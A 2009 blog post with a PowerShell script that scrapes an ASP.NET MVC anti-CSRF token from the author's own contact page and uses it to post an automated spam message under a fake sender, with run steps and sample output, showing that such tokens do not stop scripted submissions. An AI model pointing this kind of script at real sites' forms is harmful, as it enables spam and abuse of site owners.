Home > .NET, ASP.NET MVC, PowerShell > Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell

Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell

December 16th, 2009
Goto comments Leave a comment

I ported the example of how to hack an Anti CRSF Token protected form - previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For? - to PowerShell.

How to hack an Anti CRSF Token from PowerShell

function global:spam-adamdotcom(){

  # Load the assembly containing WebClientWithCookies and RegexUtilities
  [Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.WebClientWithCookies.dll")) | out-null
 
  # Load the assembly containing System.Web.HttpUtilitiy
  [void][Reflection.Assembly]::LoadWithPartialName("System.Web") | out-null 

  # create a new instance of the HTTP Web Client that supports cookies
  $webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies

  # download the page that contains the Anti CRSF Token
  [void] $webClient.DownloadData("http://adam.kahtava.com/contact");

  # use a regular expression to grab the Anti CRSF Token
  #  - this is an MVC site so we're looking for a token named "__RequestVerificationToken_Lw__"
  $regex = "__RequestVerificationToken_Lw__=(?<CRSF_Token>[^;]+)"
  $match = [regex]::matches($webClient.ResponseHeaders["Set-Cookie"], $regex)[0]
  $antiCrsfToken = $match.Groups["CRSF_Token"].Captures[0].Value

  write-host "`nYour Anti CRSF Token is: " $antiCrsfToken

  # construct the message including the Anti CSRF Token
  $message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
             "&amp;fromName=Johnathon Fink" +
             "&amp;fromAddress=prancesw@rmcres.com" +
             "&amp;subject=Call for your diploma now" +
             "&amp;body=Is your lack of a degree..."

  # send spam-spam-spam
  $webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  [void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
                              ([System.Text.Encoding]::UTF8.GetBytes($message)));

  write-host "`nSuccess!!! Your spam has been sent.`n"
}

To run this script:

  1. Download the script
  2. Run PowerShell
  3. Load the script: .\Automated-AntiCSRF-Authentication-Script.ps1
  4. Start sending spam-spam-spam: PS > spam-adamdotcom

Here's the output as seen on my machine:

PS C:\> .\Automated-AntiCSRF-Authentication-Script.ps1
PS C:\> spam-adamdotcom

Your Anti CRSF Token is:  f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L

Success!!! Your spam has been sent.

This example uses a derivation of the .NET Framework's Web Client class but with Cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be automatically resolved by issuing the download-client function that's also found within the PowerShell script.

Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1

Author: Adam Kahtava Categories: .NET, ASP.NET MVC, PowerShell Tags:
  1. No comments yet.
  1. No trackbacks yet.